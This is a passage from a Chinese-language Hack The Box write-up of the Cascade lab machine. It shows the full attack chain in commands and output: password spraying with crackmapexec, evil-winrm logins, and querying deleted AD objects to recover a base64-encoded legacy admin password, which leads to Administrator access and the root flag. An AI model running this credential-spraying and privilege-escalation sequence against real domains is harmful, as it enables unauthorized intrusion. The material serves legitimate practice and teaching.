CascAudit.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

18、这里我就不演示，这里涉及到的技能是使用DNSpy反编译这个exe文件，通过调试断点，来获取EXE文件连接数据库之间的这个密码，这里直接使用演练报告里的截图吧

w3lc0meFr31nd

19、根据 SQLite DB 中的行，此密码w3lc0meFr31nd可能与帐户 arksvc 配对。

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.182 -u users -p 'w3lc0meFr31nd' --continue-on-success
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\CascGuest:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\arksvc:w3lc0meFr31nd (Pwn3d!)
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\s.smith:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\r.thompson:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\util:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\j.wakefield:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\s.hickson:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\j.goodhand:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\a.turnbull:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\e.crowe:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\b.hanson:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\d.burman:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\BackupSvc:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\j.allen:w3lc0meFr31nd
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\i.croft:w3lc0meFr31nd

20、下面使用该账号进行登录，并进行简单的信息枚举

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -u arksvc -p "w3lc0meFr31nd" -i 10.10.10.182
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name                    arksvc
Full Name                    ArkSvc
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/9/2020 5:18:20 PM
Password expires             Never
Password changeable          1/9/2020 5:18:20 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/13/2024 1:36:30 PM

Logon hours allowed          All

Local Group Memberships      *AD Recycle Bin       *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

21、AD Recycle Bin是一个著名的Windows小组。Active Directory 对象恢复（或回收站）是 Server 2008 中添加的一项功能，允许管理员恢复已删除的项目，就像回收站恢复文件一样。链接的文章提供了一个 PowerShell 命令来查询域中所有已删除的对象：

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

Deleted           : True
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
Name              : CASC-WS1
                    DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
ObjectClass       : computer
ObjectGUID        : 6d97daa4-2e82-4946-a11e-f91fa18bfabe

Deleted           : True
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
Name              : Scheduled Tasks
                    DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
ObjectClass       : group
ObjectGUID        : 13375728-5ddb-4137-b8b8-b9041d1d3fd2

Deleted           : True
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Name              : {A403B701-A528-4685-A816-FDEE32BDDCBA}
                    DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ObjectClass       : groupPolicyContainer
ObjectGUID        : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e

Deleted           : True
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
Name              : Machine
                    DEL:93c23674-e411-400b-bb9f-c0340bda5a34
ObjectClass       : container
ObjectGUID        : 93c23674-e411-400b-bb9f-c0340bda5a34

Deleted           : True
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
Name              : User
                    DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
ObjectClass       : container
ObjectGUID        : 746385f2-e3a0-4252-b83a-5a206da0ed88

Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin
                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059

*Evil-WinRM* PS C:\Users\arksvc\Documents>

22、最后一个非常有趣，因为它是我之前发现的旧电子邮件中提到的临时管理帐户（其中还说它使用与普通管理员帐户相同的密码），我可以获得该帐户的所有详细信息：

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

*Evil-WinRM* PS C:\Users\arksvc\Documents>

23、这里对发现的密码进行base64解密

1
2
3

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles

24、尝试该密码是否为管理员密码，是否可用

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.182 -u administrator -p baCT3r1aN00dles
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)


┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.182 -u administrator -p baCT3r1aN00dles
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)

25、可以的，那就获取下最终的flag信息吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -u administrator -p baCT3r1aN00dles -i 10.10.10.182
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
b8ac5aea659109d68110ffeffc5a7e0e
*Evil-WinRM* PS C:\Users\Administrator\Documents>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/235

打靶记

#shooting-range

Cascade-htb-writeup

https://sh1yan.top/2024/05/13/Cascade-htb-writeup/

作者

shiyan

发布于

2024年5月13日

许可协议

Flight-htb-writeup 上一篇

Monteverde-htb-writeup 下一篇